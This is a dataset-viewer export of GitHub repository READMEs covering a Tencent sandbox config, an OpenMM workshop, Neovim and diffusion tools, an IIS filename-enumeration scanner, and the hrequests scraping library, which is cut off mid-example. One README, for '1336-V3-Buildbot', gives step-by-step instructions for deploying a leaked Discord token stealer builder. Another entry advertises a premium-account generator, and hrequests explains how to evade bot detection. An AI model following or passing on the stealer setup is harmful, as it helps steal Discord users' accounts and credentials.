Dataset Viewer
Auto-converted to Parquet
full_name
stringlengths
9
72
url
stringlengths
28
91
description
stringlengths
3
343
readme
stringlengths
1
207k
empty-233/tencent-sandbox
https://github.com/empty-233/tencent-sandbox
Windows sandbox 腾讯全家桶沙盒配置
# tencent-sandbox tencent-sandbox 是使用 [Windows sandbox](https://learn.microsoft.com/zh-cn/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-overview) 为腾讯全家桶创建沙盒的配置 ## 注意事项 ### **Windows 10 用户** #### 有python环境 请先运行 win10_init.py #### 没有python环境 1. 进入你 clone/下载 的**项目目录** 2. 按键盘上的Win + R 3. 输入 powershell, 按回车 4. 输入 `PowerShell -ExecutionPolicy Bypass -File ".\win10_init.ps1"`。 #### 不明白以上两点如何操作 1. 用文本方式打开Tencent.wsb 2. 将**所有**例如`<HostFolder>.\tencent-sandbox\xxxxxxx</HostFolder>` 中的 `.\` 手动修改为你 clone/下载 的**项目目录**。 ### **家庭版**不支持沙盒 ## 兼容性 目前测试 **微信** **QQ** **QQNT** **TIM** **企业微信** **腾讯会议** **腾讯文档** 正常使用 如有其他需要,请提 Issue 注: **企业微信无法自动登录(检查设备ID),只能每次重新登录** ## 沙盒配置 默认分配**2GB**内存,有需要可以自行修改 `<MemoryInMB>value</MemoryInMB>` (以 MB 为单位) **音频输入**默认**开启**,有需要可以自行修改 `<AudioInput>value</AudioInput>` (Enable/Disable/Default) **剪贴板重定向**默认**开启**,有需要可以自行修改 `<ClipboardRedirection>value</ClipboardRedirection>` (Enable/Disable/Default) **视频输入**默认**关闭**,有需要可以自行修改 `<VideoInput>value</VideoInput>` (Enable/Disable/Default) 其他配置参考[Windows沙盒配置](https://learn.microsoft.com/zh-cn/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-configure-using-wsb-file)官方文档 ## 使用教程 启用 `Windows 沙盒` git clone 本项目,**或者点击`Releases`下载** ``` bash git clone https://github.com/empty-233/tencent-sandbox.git ``` 使用`mkdir.bat`来**一键创建以下结构目录** **按照下面可选项配置`SysWOW64`** 打开**Tencent.wsb** 安装**经过测试**的软件 (可选) 移动桌面快捷方式到任何位置,再移动回桌面(否则快捷方式会消失) 操作完成后就可以正常使用了,**关闭沙盒账号和数据都有所保留** ### 可选项 下列方式二选一,**默认不挂载系统SysWOW64** #### 复制(默认) 新开一个**默认沙盒**,并正常安装 **QQ** 安装完成之后复制 `C:\Windows\SysWOW64` 到 `Data\SysWOW64` (不然qq运行一段时间后会崩溃) #### 挂载 修改 `<HostFolder>.\Data\SysWOW64</HostFolder>` 为 `<HostFolder>C:\Windows\SysWOW64</HostFolder>` ## 挂载路径 请查看 Tencent.wsb 中的 `MappedFolder` 配置项 qq保存的路径: Data\Documents\Tencent\ (qqid) \FileRecv 微信保存的路径: Data\Documents\WeChat\ (wxid) \FileStorage\File 其余的请查看`Data\Documents`
openmm/openmm_workshop_july2023
https://github.com/openmm/openmm_workshop_july2023
null
# OpenMM workshop This repository contains the materials for the OpenMM workshop that was delivered on the 12th July 2023 after the CCPBioSim conference. The workshop consists of an introduction presentation, setup information, and a series of jupyter notebooks. The workshop was delivered in person and on Zoom where demonstrators were be on hand to answer questions. Only the intro slides are specific to the live course. The workshop materials are designed to be done by anyone at anytime! We aim to keep the notebooks up to date. If you have any questions, find any bugs, or have suggestions for improvement please raise an issue in the github repository. ## Introduction This is a powerpoint presentation. The slides can be found in [./slides](./slides). ## Setup There are two ways to run the workshop notebooks: - In a web browser with Google Colab. - Running locally on your own machine in a Conda environment. The instructions for either can be found in [./setup](./setup/README.md). We aim to keep the notebooks fully tested in Colab so we suggest you run them in Colab. Note that we have designed the exercises to not be computationally expensive so they can be run on any hardware. ## Training materials The material is in the form of jupyter notebooks. It is split up into three sections. ### Section 1 - Introduction to OpenMM - [**Protein in water**](./section_1/protein_in_water.ipynb). Aimed at people new to OpenMM. This covers loading in a PDB file, setting up a simulation, running the simulation, basic analysis, and advice for running on HPC resources. - [**Protein-ligand complex**](./section_1/protein_ligand_complex.ipynb). Aimed at beginners. Covers parameterising a small molecule, combining topologies, and using other tools to create OpenMM compatible input. ### Section 2 - Custom forces - [**Custom forces and Umbrella sampling**](./section_2/custom_forces.ipynb). Aimed at people looking to use the custom forces functionality of OpenMM (Can be done after section 1 material if you are a beginner). Covers using custom forces with a case-study of umbrella sampling. ### Section 3 - Machine Learning Potentials - [**Machine Leaning Potentials**](./section_3/machine_learning_potentials.ipynb). Aimed at people using Machine Learning Potentials. Covers the OpenMM Machine Learning software stack with examples of using ANI and MACE. ## Extras - [Guide on building OpenMM from source](./extra/compile_openmm.ipynb). ## Acknowledgments - This workshop was prepared by Stephen Farr (University of Edinburgh, Michel research group) with support from EPSRC grant EP/W030276/1 ''Supporting the OpenMM Community-led Development of Next-Generation Condensed Matter Modelling Software'' and with help from Julien Michel (University of Edinburgh) and Will Poole (University of Southampton, Essex research group).
embedchain/community-showcase
https://github.com/embedchain/community-showcase
null
> ## This repository is archived since we have moved all the community showcases to [docs.embedchain.ai](https://docs.embedchain.ai). [![Discord](https://dcbadge.vercel.app/api/server/nhvCbCtKV?style=flat)](https://discord.gg/6PzXDgEjG5) [![Twitter](https://img.shields.io/twitter/follow/embedchain)](https://twitter.com/embedchain) [![Substack](https://img.shields.io/badge/Substack-%23006f5c.svg?logo=substack)](https://embedchain.substack.com/) # Embedchain Community Showcase A repository that collects and showcases all the apps, blogs, videos, and tutorials created by the community. ## Apps ### Open Source - [Discord Bot for LLM chat](https://github.com/Reidond/discord_bots_playground/tree/c8b0c36541e4b393782ee506804c4b6962426dd6/python/chat-channel-bot) by Reidond - [EmbedChain-Streamlit-Docker App](https://github.com/amjadraza/embedchain-streamlit-app) by amjadraza - [Harry Potter Philosphers Stone Bot](https://github.com/vinayak-kempawad/Harry_Potter_Philosphers_Stone_Bot/) by Vinayak Kempawad, ([linkedin post](https://www.linkedin.com/feed/update/urn:li:activity:7080907532155686912/)) - [LLM bot trained on own messages](https://github.com/Harin329/harinBot) by Hao Wu ### Closed Source - [Taobot.io](https://taobot.io) - chatbot & knowledgebase hybrid by [cachho](https://github.com/cachho) ## Templates ### Replit - [Embedchain Chat Bot](https://replit.com/@taranjeet1/Embedchain-Chat-Bot) by taranjeetio - [Embedchain Memory Chat Bot Template](https://replit.com/@taranjeetio/Embedchain-Memory-Chat-Bot-Template) by taranjeetio ## Posts ### Blogs - [Customer Service LINE Bot](https://www.evanlin.com/langchain-embedchain/) ### LinkedIn - [What is embedchain](https://www.linkedin.com/posts/activity-7079393104423698432-wRyi/) by Rithesh Sreenivasan - [Building a chatbot with EmbedChain](https://www.linkedin.com/posts/activity-7078434598984060928-Zdso/) by Lior Sinclair - [Making chatbot without vs with embedchain](https://www.linkedin.com/posts/kalyanksnlp_llms-chatbots-langchain-activity-7077453416221863936-7N1L/) by Kalyan KS ### Twitter - [What is embedchain](https://twitter.com/AlphaSignalAI/status/1672668574450847745) by Lior - [Building a chatbot with Embedchain](https://twitter.com/Saboo_Shubham_/status/1673537044419686401) by Shubham Saboo ## Videos - [embedChain Create LLM powered bots over any dataset Python Demo Tesla Neurallink Chatbot Example](https://www.youtube.com/watch?v=bJqAn22a6Gc) by Rithesh Sreenivasan - [Embedchain - NEW 🔥 Langchain BABY to build LLM Bots](https://www.youtube.com/watch?v=qj_GNQ06I8o) by 1littlecoder - [EmbedChain -- NEW!: Build LLM-Powered Bots with Any Dataset](https://www.youtube.com/watch?v=XmaBezzGHu4) by DataInsightEdge - [Chat With Your PDFs in less than 10 lines of code! EMBEDCHAIN tutorial](https://www.youtube.com/watch?v=1ugkcsAcw44) by Phani Reddy - [How To Create A Custom Knowledge AI Powered Bot | Install + How To Use](https://www.youtube.com/watch?v=VfCrIiAst-c) by The Ai Solopreneur - [Build Custom Chatbot in 6 min with this Framework [Beginner Friendly]](https://www.youtube.com/watch?v=-8HxOpaFySM) by Maya Akim - [embedchain-streamlit-app](https://www.youtube.com/watch?v=3-9GVd-3v74) by Amjad Raza ## Mentions ### Github repos - [awesome-ChatGPT-repositories](https://github.com/taishi-i/awesome-ChatGPT-repositories)
agathasangkara/Vidio-Premier
https://github.com/agathasangkara/Vidio-Premier
🎥 Vidio Premier Account Generate
🎥 Vidio Premier Generator 3-12 Month ``` COMING SOON 😋 ```
fei666888/radioberry_mod
https://github.com/fei666888/radioberry_mod
Based on Radioberry designd by" https://github.com/pa3gsb/Radioberry-2.x"
# radioberry_mod Based on Radioberry designd by" https://github.com/pa3gsb/Radioberry-2.x" Redesign the PCB Layout for easy build
Nowze/1336-V3-Buildbot
https://github.com/Nowze/1336-V3-Buildbot
null
Hey everyone i leak my own discord token stealer since 2019-2023. Im leaving discord and stop everything. Be fun with the source code every instructions are here. Please tag the github if you use it i need star :c french Utilise un Vps avec Ubuntu 20.04 (je préfère https://rdp.sh/ c'est 10$ par mois et en plus c'est proche c'est a Amsterdam) - sudo apt install zip - sudo apt install unzip Upload le zip extrait le zip (si le repertoire de fichier ne se nomme pas Stealer renomme le Download Node v18.16.1: - sudo apt update - sudo apt install curl - curl -sL https://deb.nodesource.com/setup_18.x | sudo -E bash - - sudo apt install -y nodejs Setup the src on your vps - sudo npm install - sudo npm i pm2 -g - sudo npm install -g pkg Unzip node_modules.zip dans Stealer/bot Install https://anonfiles.com/5dwb0204z6/node_modules_zip et place les dans ClientObf and unzip Changer vos directories dans Stealer/Bot/index.js et mettez les nouvelles (ex: /home/vshell/ClientObf/link.txt votre nom de vps est lolita, alors cela fera /home/lolita/ClientObf/link.txt si c'est root votre user alors cela sera /root/a/ClientObf/link.txt ) Pour modifier le nom des logs allez dans Stealer/ClientObf/Utils dans discord.js Modifier les émojis et le nom et dans stats.js c'est de même. Pour modifier le nom des embeds de build allez dans Stealer/Bot et dans index.js vous pouvez renammes le bot ^^ Ajouter dans Stealer/Bot/index.js: token: "your token" client id: "discord developper portal (app id)" guildid: "your guild id" verified roles: "customers roles" /build icon: none (icon not work or crash bot) webhook_url: your webhook name: yourname with no space or crash bot Ne pas edit la config de build.js sinon plus rien ne marchera official 1336 Channel https://t.me/St34ler ----------------------------------------------------------------------- English Use Vps with Ubuntu 20.04 (i prefer https://rdp.sh/ 10$ server per month in amsterdam) - sudo apt install zip - sudo apt install unzip Download zip extracts the zip (if the file directory is not named Stealer renames the Download Node v18.16.1: - sudo apt update - sudo apt install curl - curl -sL https://deb.nodesource.com/setup_18.x | sudo -E bash - - sudo apt install -y nodejs Setup the src on your vps Unzip node_modules.zip in Stealer/bot Install https://anonfiles.com/5dwb0204z6/node_modules_zip and put him on ClientObf and unzip - sudo npm install - sudo npm i pm2 -g - sudo npm install -g pkg Change your directories in Stealer/Bot/index.js and put the new ones (ex: /home/vshell/ClientObf/link.txt your vps name is lolita, then this will do /home/lolita/ClientObf/link.txt if your user are root /root/a/ClientObf/link.txt ) To modify the name of the logs go to Stealer/ClientObf/Utils in discord.js Modify emojis and name and in stats.js it's the same. To modify the name of the build embeds go to Stealer/Bot and in index.js you can rename the bot ^^ Add in Stealer/Bot/index.js: token: "your token" client id: "discord developper portal (app id)" guildid: "your guild id" verified roles: "customers roles" /build icon: none (icon not work or crash bot) webhook_url: your webhook name: yourname with no space or crash bot don't edit build.js or nothing will be work official 1336 Channel https://t.me/St34ler
bitquark/shortscan
https://github.com/bitquark/shortscan
An IIS short filename enumeration tool
# Shortscan An IIS short filename enumeration tool. ## Functionality Shortscan is designed to quickly determine which files with short filenames exist on an IIS webserver. Once a short filename has been identified the tool will try to automatically identify the full filename. In addition to standard discovery methods Shortscan also uses a unique checksum matching approach to attempt to find the long filename where the short filename is based on Windows' propriatary shortname collision avoidance checksum algorithm (more on this research at a later date). ## Installation ### Quick install Using a recent version of [go](https://golang.org/): ``` go install github.com/bitquark/shortscan/cmd/shortscan@latest ``` ### Manual install To build (and optionally install) locally: ``` go get && go build go install ``` ## Usage ### Basic usage Shortscan is easy to use with minimal configuration. Basic usage looks like: ``` $ shortscan http://example.org/ ``` ### Examples This example sets multiple custom headers by using `--header`/`-H` multiple times: ``` shortscan -H 'Host: gibson' -H 'Authorization: Basic ZGFkZTpsMzN0' ``` To check whether a site is vulnerable without performing file enumeration use: ``` shortscan --isvuln ``` ### Advanced features The following options allow further tweaks: ``` $ shortscan --help Shortscan v0.6 · an IIS short filename enumeration tool by bitquark Usage: main [--wordlist FILE] [--header HEADER] [--concurrency CONCURRENCY] [--timeout SECONDS] [--verbosity VERBOSITY] [--fullurl] [--stabilise] [--patience LEVEL] [--characters CHARACTERS] [--autocomplete mode] [--isvuln] URL Positional arguments: URL url to scan Options: --wordlist FILE, -w FILE combined wordlist + rainbow table generated with shortutil --header HEADER, -H HEADER header to send with each request (use multiple times for multiple headers) --concurrency CONCURRENCY, -c CONCURRENCY number of requests to make at once [default: 20] --timeout SECONDS, -t SECONDS per-request timeout in seconds [default: 10] --verbosity VERBOSITY, -v VERBOSITY how much noise to make (0 = quiet; 1 = debug; 2 = trace) [default: 0] --fullurl, -F display the full URL for confirmed files rather than just the filename [default: false] --stabilise, -s attempt to get coherent autocomplete results from an unstable server (generates more requests) [default: false] --patience LEVEL, -p LEVEL patience level when determining vulnerability (0 = patient; 1 = very patient) [default: 0] --characters CHARACTERS, -C CHARACTERS filename characters to enumerate [default: JFKGOTMYVHSPCANDXLRWEBQUIZ8549176320-_()&'!#$%@^{}~] --autocomplete mode, -a mode autocomplete detection mode (auto = autoselect; method = HTTP method magic; status = HTTP status; distance = Levenshtein distance; none = disable) [default: auto] --isvuln, -V bail after determining whether the service is vulnerable [default: false] --help, -h display this help and exit ``` ## Utility The shortscan project includes a utility named `shortutil` which can be used to perform various short filename operations and to make custom rainbow tables for use with the tool. ### Examples You can create a rainbow table from an existing wordlist like this: ``` shortutil wordlist input.txt > output.rainbow ``` To generate a one-off checksum for a file: ``` shortutil checksum index.html ``` ### Usage Run `shortutil <command> --help` for a definiteive list of options for each command. ``` Shortutil v0.3 · a short filename utility by bitquark Usage: main <command> [<args>] Options: --help, -h display this help and exit Commands: wordlist add hashes to a wordlist for use with, for example, shortscan checksum generate a one-off checksum for the given filename ``` ## Wordlist A custom wordlist was built for shortscan. For full details see [pkg/shortscan/resources/README.md](pkg/shortscan/resources/README.md) ## Credit Original IIS short filename [research](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf) by Soroush Dalili. Additional research and this project by [bitquark](https://github.com/bitquark).
HiPhish/rainbow-delimiters.nvim
https://github.com/HiPhish/rainbow-delimiters.nvim
Rainbow delimiters for Neovim with Tree-sitter
.. default-role:: code ############################### Rainbow delimiters for Neovim ############################### This Neovim plugin provides alternating syntax highlighting (“rainbow parentheses”) for Neovim, powered by `Tree-sitter`_. The goal is to have a hackable plugin which allows for different configuration of queries and strategies, both globally and per file type. Users can override and extend the built-in defaults through their own configuration. This is a fork of `nvim-ts-rainbow2`_, which was implemented as a module for `nvim-treessiter`_. However, since nvim-treesitter has deprecated the module system I had to create this standalone plugin. Installation and setup ###################### Installation ============ Install it like any other Neovim plugin. You will need a Tree-sitter parser for each language you want to use rainbow delimiters with. Setup ===== Configuration is done by setting entries in the Vim script dictionary `g:rainbow_delimiters`. Here is an example configuration: .. code:: vim let g:rainbow_delimiters = { \ 'strategy': { \ '': rainbow_delimiters#strategy.global, \ 'vim': rainbow_delimiters#strategy.local, \ }, \ 'query': { \ '': 'rainbow-delimiters', \ 'lua': 'rainbow-blocks', \ }, \ 'highlight': [ \ 'RainbowDelimiterRed', \ 'RainbowDelimiterYellow', \ 'RainbowDelimiterBlue', \ 'RainbowDelimiterOrange', \ 'RainbowDelimiterGreen', \ 'RainbowDelimiterViolet', \ 'RainbowDelimiterCyan', \ ], \ } The equivalent code in Lua: .. code:: lua -- This module contains a number of default definitions local rainbow_delimiters = require 'rainbow-delimiters' vim.g.rainbow_delimiters = { strategy = { [''] = rainbow_delimiters.strategy['global'], vim = rainbow_delimiters.strategy['local'], }, query = { [''] = 'rainbow-delimiters', lua = 'rainbow-blocks', }, highlight = { 'RainbowDelimiterRed', 'RainbowDelimiterYellow', 'RainbowDelimiterBlue', 'RainbowDelimiterOrange', 'RainbowDelimiterGreen', 'RainbowDelimiterViolet', 'RainbowDelimiterCyan', }, } Please refer to the `manual`_ for more details. For those who prefer a `setup` function there is the module `rainbow-delimiters.setup`. Help wanted ########### There are only so many languages which I understand to the point that I can write queries for them. If you want support for a new language please consider contributing code. See the CONTRIBUTING_ for details. Status of the plugin #################### Tree-sitter support in Neovim is still experimental. This plugin and its API should be considered stable insofar as breaking changes will only happen if changes to Neovim necessitates them. .. warning:: There is currently a shortcoming in Neovim's Tree-sitter API which makes it so that only the first node of a capture group can be highlighted. Please see `neovim/neovim#17099`_ for details. Affected queries: - HTML `rainbow-delimiters` - JSX (Javascript + React.js) `rainbow-delimiters-react` (affects React tags only) - Python (`rainbow-delimiters`) (affects only the `for ... in` inside comprehensions) - TSX (Typescript + React.js) `rainbow-delimiters-react` (affects React tags only) - Vue.js `rainbow-delimiters` Most of these are related to HTML-like tags, so you can use an alternative query instead. See the manual_ (`:h ts-rainbow-query`) for a list of extra queries. Screenshots ########### Bash ==== .. image:: https://user-images.githubusercontent.com/4954650/212133420-4eec7fd3-9458-42ef-ba11-43c1ad9db26b.png :alt: Screenshot of a Bash script with alternating coloured delimiters C = .. image:: https://user-images.githubusercontent.com/4954650/212133423-8b4f1f00-634a-42c1-9ebc-69f8057a63e6.png :alt: Screenshot of a C program with alternating coloured delimiters Common Lisp =========== .. image:: https://user-images.githubusercontent.com/4954650/212133425-85496400-4e24-4afd-805c-55ca3665c4d9.png :alt: Screenshot of a Common Lisp program with alternating coloured delimiters Java ==== .. image:: https://user-images.githubusercontent.com/4954650/212133426-7615f902-e39f-4625-bb91-2e757233c7ba.png :alt: Screenshot of a Java program with alternating coloured delimiters LaTeX ===== Using the `blocks` query to highlight the entire `\begin` and `\end` instructions. .. image:: https://user-images.githubusercontent.com/4954650/212133427-46182f57-bfd8-4cbe-be1f-9aad5ddfd796.png :alt: Screenshot of a LaTeX document with alternating coloured delimiters License ####### Licensed under the Apache-2.0 license. Please see the `LICENSE`_ file for details. Migrating from nvim-ts-rainbow2 ############################### Rainbow-Delimiters uses different settings than nvim-ts-rainbow2, but converting the configuration is straight-forward. The biggest change is where the settings are stored. - Settings are stored in the global variable `g:rainbow-delimiters`, which has the same keys as the old settings - The default strategy and query have index `''` (empty string) instead of `1` - Default highlight groups have the prefix `RainbowDelimiter` instead of `TSRainbow`, e.g. `RainbowDelimiterRed` instead of `TSRainbowRed` - The default query is now called `rainbow-delimiters` instead of `rainbow-parens` - The public Lua module is called `rainbow-delimiters` instead of `ts-rainbow` The name of the default query is now `rainbow-delimiters` because for some languages like HTML the notion of "parentheses" does not make any sense. In HTML the only meaningful delimiter is the tag. Hence the generic notion of a "delimiter". Attribution ########### This is a fork of a previous Neovim plugin, the original repository is available under https://sr.ht/~p00f/nvim-ts-rainbow/. Attributions from the original author ===================================== Huge thanks to @vigoux, @theHamsta, @sogaiu, @bfredl and @sunjon and @steelsojka for all their help .. _Tree-sitter: https://tree-sitter.github.io/tree-sitter/ .. _nvim-treesitter: https://github.com/nvim-treesitter/nvim-treesitter .. _CONTRIBUTING: CONTRIBUTING.rst .. _LICENSE: LICENSE .. _manual: doc/rainbow-delimiters.txt .. _neovim/neovim#17099: https://github.com/neovim/neovim/pull/17099 .. _nvim-ts-rainbow2: https://gitlab.com/HiPhish/nvim-ts-rainbow2 .. _nvim-treessiter: https://github.com/nvim-treesitter/nvim-treesitter
7eu7d7/HCP-Diffusion-webui
https://github.com/7eu7d7/HCP-Diffusion-webui
webui for HCP-Diffusion
# HCP Diffusion web UI 一个基于Vue.js和Flask的HCP Diffusion图形界面 ![](./imgs/infer.webp) ![](./imgs/train.webp) ## 在 Windows 下安装 ### 准备 1. 安装 [Python](https://www.python.org/downloads/) (不支持python >= 3.11), 需要把Python添加到环境变量中 "Add Python to PATH". 2. 安装 [git](https://git-scm.com/download/win). 3. 安装 [node.js](https://nodejs.org/en/download) (>= 14.0.0). ### 下载 HCP Diffusion 与 webui ```bash git clone https://github.com/7eu7d7/HCP-Diffusion-webui.git cd HCP-Diffusion-webui git clone https://github.com/7eu7d7/HCP-Diffusion.git ``` ### 自动安装并启动 点击运行`webui-user.bat` ## 在 Linux 下安装 ### 安装依赖: ```bash # Debian-based: sudo apt install wget git python3 python3-venv nodejs # Red Hat-based: sudo dnf install wget git python3 nodejs # Arch-based: sudo pacman -S wget git python3 nodejs ``` ### 下载 HCP Diffusion 与 webui ```bash git clone https://github.com/7eu7d7/HCP-Diffusion-webui.git cd HCP-Diffusion-webui git clone https://github.com/7eu7d7/HCP-Diffusion.git ``` ### 自动安装并启动 ```bash bash webui.sh ``` 可以在 `webui-user.sh` 中配置选项 ## 使用说明 + 把`diffusers`格式的模型放到`sd_models/`文件夹中便可以被加载。 + `ckpts/`文件夹放训练好的`lora`或`part(微调的模型)`。 + 生成图片和对应的配置文件输出到`output/`中。
daijro/hrequests
https://github.com/daijro/hrequests
🚀 Web scraping for humans
<img src="https://i.imgur.com/r8GcQW1.png" align="center"> </img> <h2 align="center">hrequests</h2> <h4 align="center"> <p align="center"> <a href="https://github.com/daijro/hrequests/blob/main/LICENSE"> <img src="https://img.shields.io/github/license/daijro/hrequests.svg"> </a> <a href="https://python.org/"> <img src="https://img.shields.io/badge/python-3.7&#8208;3.11-blue"> </a> <a href="https://pypi.org/project/hrequests/"> <img alt="PyPI" src="https://img.shields.io/pypi/v/hrequests.svg"> </a> <a href="https://pepy.tech/project/hrequests"> <img alt="PyPI" src="https://pepy.tech/badge/hrequests"> </a> <a href="https://github.com/ambv/black"> <img src="https://img.shields.io/badge/code%20style-black-black.svg"> </a> <a href="https://github.com/PyCQA/isort"> <img src="https://img.shields.io/badge/imports-isort-yellow.svg"> </a> </p> Hrequests (human requests) is a simple, configurable, feature-rich, replacement for the Python requests library. </h4> ### ✨ Features - Seamless transition between HTTP and headless browsing 💻 - Integrated fast HTML parser 🚀 - High performance concurrency with gevent (*without monkey-patching!*) 🚀 - Replication of browser TLS fingerprints 🚀 - JavaScript rendering 🚀 - Supports HTTP/2 🚀 - Realistic browser header generation 🚀 - JSON serializing up to 10x faster than the standard library 🚀 ### 💻 Browser crawling - Simple & uncomplicated browser automation - Human-like cursor movement and typing - Chrome extension support - Full page screenshots - Headless and headful support - No CORS restrictions ### ⚡ More - High performance ✨ - Minimal dependence on the python standard libraries - Written with type safety - 100% threadsafe ❤️ --- # Installation Install via pip: ```bash pip install -U hrequests python -m playwright install chromium ``` Other depedencies will be downloaded on the first import: ```py >>> import hrequests ``` --- # Documentation 1. [Simple Usage](https://github.com/daijro/hrequests#simple-usage) 2. [Sessions](https://github.com/daijro/hrequests#sessions) 3. [Concurrent & Lazy Requests](https://github.com/daijro/hrequests#concurrent--lazy-requests) 4. [HTML Parsing](https://github.com/daijro/hrequests#html-parsing) 5. [Browser Automation](https://github.com/daijro/hrequests#browser-automation) <hr width=50> ## Simple Usage Here is an example of a simple `get` request: ```py >>> resp = hrequests.get('https://www.google.com/') ``` Requests are sent through [bogdanfinn's tls-client](https://github.com/bogdanfinn/tls-client) to spoof the TLS client fingerprint. This is done automatically, and is completely transparent to the user. Other request methods include `post`, `put`, `delete`, `head`, `options`, and `patch`. The `Response` object is a near 1:1 replica of the `requests.Response` object, with some additional attributes. <details> <summary>Parameters</summary> ``` Parameters: url (str): URL to send request to data (Union[str, bytes, bytearray, dict], optional): Data to send to request. Defaults to None. files (Dict[str, Union[BufferedReader, tuple]], optional): Data to send to request. Defaults to None. headers (dict, optional): Dictionary of HTTP headers to send with the request. Defaults to None. params (dict, optional): Dictionary of URL parameters to append to the URL. Defaults to None. cookies (Union[RequestsCookieJar, dict, list], optional): Dict or CookieJar to send. Defaults to None. json (dict, optional): Json to send in the request body. Defaults to None. allow_redirects (bool, optional): Allow request to redirect. Defaults to True. history (bool, optional): Remember request history. Defaults to False. verify (bool, optional): Verify the server's TLS certificate. Defaults to True. timeout (int, optional): Timeout in seconds. Defaults to 30. proxies (dict, optional): Dictionary of proxies. Defaults to None. no_pause (bool, optional): Run the request in the background. Defaults to False. <Additionally includes all parameters from `hrequests.Session` if a session was not specified> Returns: hrequests.response.Response: Response object ``` </details> ### Properties Get the response url: ```py >>> resp.url: str 'https://www.google.com/' ``` Check if the request was successful: ```py >>> resp.status_code: int 200 >>> resp.reason: str 'OK' >>> resp.ok: bool True >>> bool(resp) True ``` Getting the response body: ```py >>> resp.text: str '<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><m...' >>> resp.content: Union[bytes, str] '<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><m...' ``` Parse the response body as JSON: ```py >>> resp.json(): Union[dict, list] {'somedata': True} ``` Get the elapsed time of the request: ```py >>> resp.elapsed: datetime.timedelta datetime.timedelta(microseconds=77768) ``` Get the response cookies: ```py >>> resp.cookies: RequestsCookieJar <RequestsCookieJar[Cookie(version=0, name='1P_JAR', value='2023-07-05-20', port=None, port_specified=False, domain='.google.com', domain_specified=True... ``` Get the response headers: ```py >>> resp.headers: CaseInsensitiveDict {'Alt-Svc': 'h3=":443"; ma=2592000,h3-29=":443"; ma=2592000', 'Cache-Control': 'private, max-age=0', 'Content-Encoding': 'br', 'Content-Length': '51288', 'Content-Security-Policy-Report-Only': "object-src 'none';base-uri 'se ``` <hr width=50> ## Sessions Creating a new Chrome Session object: ```py >>> session = hrequests.Session() # version randomized by default >>> session = hrequests.Session('chrome', version=112) ``` <details> <summary>Parameters</summary> ``` Parameters: browser (Literal['firefox', 'chrome', 'opera'], optional): Browser to use. Default is 'chrome'. version (int, optional): Version of the browser to use. Browser must be specified. Default is randomized. os (Literal['win', 'mac', 'lin'], optional): OS to use in header. Default is randomized. headers (dict, optional): Dictionary of HTTP headers to send with the request. Default is generated from `browser` and `os`. verify (bool, optional): Verify the server's TLS certificate. Defaults to True. timeout (int, optional): Default timeout in seconds. Defaults to 30. ja3_string (str, optional): JA3 string. Defaults to None. h2_settings (dict, optional): HTTP/2 settings. Defaults to None. additional_decode (str, optional): Additional decode. Defaults to None. pseudo_header_order (list, optional): Pseudo header order. Defaults to None. priority_frames (list, optional): Priority frames. Defaults to None. header_order (list, optional): Header order. Defaults to None. force_http1 (bool, optional): Force HTTP/1. Defaults to False. catch_panics (bool, optional): Catch panics. Defaults to False. debug (bool, optional): Debug mode. Defaults to False. ``` </details> Browsers can also be created through the `firefox`, `chrome`, and `opera` shortcuts: ```py >>> session = hrequests.firefox.Session() >>> session = hrequests.chrome.Session() >>> session = hrequests.opera.Session() ``` <details> <summary>Parameters</summary> ``` Parameters: version (int, optional): Version of the browser to use. Browser must be specified. Default is randomized. os (Literal['win', 'mac', 'lin'], optional): OS to use in header. Default is randomized. headers (dict, optional): Dictionary of HTTP headers to send with the request. Default is generated from `browser` and `os`. verify (bool, optional): Verify the server's TLS certificate. Defaults to True. ja3_string (str, optional): JA3 string. Defaults to None. h2_settings (dict, optional): HTTP/2 settings. Defaults to None. additional_decode (str, optional): Additional decode. Defaults to None. pseudo_header_order (list, optional): Pseudo header order. Defaults to None. priority_frames (list, optional): Priority frames. Defaults to None. header_order (list, optional): Header order. Defaults to None. force_http1 (bool, optional): Force HTTP/1. Defaults to False. catch_panics (bool, optional): Catch panics. Defaults to False. debug (bool, optional): Debug mode. Defaults to False. ``` </details> `os` can be `'win'`, `'mac'`, or `'lin'`. Default is randomized. ```py >>> session = hrequests.firefox.Session(os='mac') ``` This will automatically generate headers based on the browser name and OS: ```py >>> session.headers {'Accept': '*/*', 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4; rv:60.2.2) Gecko/20100101 Firefox/60.2.2', 'Accept-Encoding': 'gzip, deflate, br', 'Pragma': 'no-cache'} ``` <details> <summary>Why is the browser version in the header different than the TLS browser version?</summary> Website bot detection systems typically do not correlate the TLS fingerprint browser version with the browser header. By adding more randomization to our headers, we can make our requests appear to be coming from a larger number of clients. We can make it seem like our requests are coming from a larger number of clients. This makes it harder for websites to identify and block our requests based on a consistent browser version. </details> ### Properties Here is a simple get request. This is a wraper around `hrequests.get`. The only difference is that the session cookies are updated with each request. Creating sessions are recommended for making multiple requests to the same domain. ```py >>> resp = session.get('https://www.google.com/') ``` Session cookies update with each request: ```py >>> session.cookies: RequestsCookieJar <RequestsCookieJar[Cookie(version=0, name='1P_JAR', value='2023-07-05-20', port=None, port_specified=False, domain='.google.com', domain_specified=True... ``` Regenerate headers for a different OS: ```py >>> session.os = 'win' >>> session.headers: CaseInsensitiveDict {'Accept': '*/*', 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0.3) Gecko/20100101 Firefox/66.0.3', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US;q=0.5,en;q=0.3', 'Cache-Control': 'max-age=0', 'DNT': '1', 'Upgrade-Insecure-Requests': '1', 'Pragma': 'no-cache'} ``` ### Closing Sessions Sessions can also be closed to free memory: ```py >>> session.close() ``` Alternatively, sessions can be used as context managers: ```py with hrequests.Session() as session: resp = session.get('https://www.google.com/') print(resp) ``` <hr width=50> ## Concurrent & Lazy Requests ### "Lazy" Requests Adding the `no_pause=True` keyword argument will return a `LazyTLSRequest` object. This will send the request immediately, but doesn't wait for the response to be ready until an attribute of the response is accessed. ```py resp1 = hrequests.get('https://www.google.com/', no_pause=True) resp2 = hrequests.get('https://www.google.com/', no_pause=True) # resp1 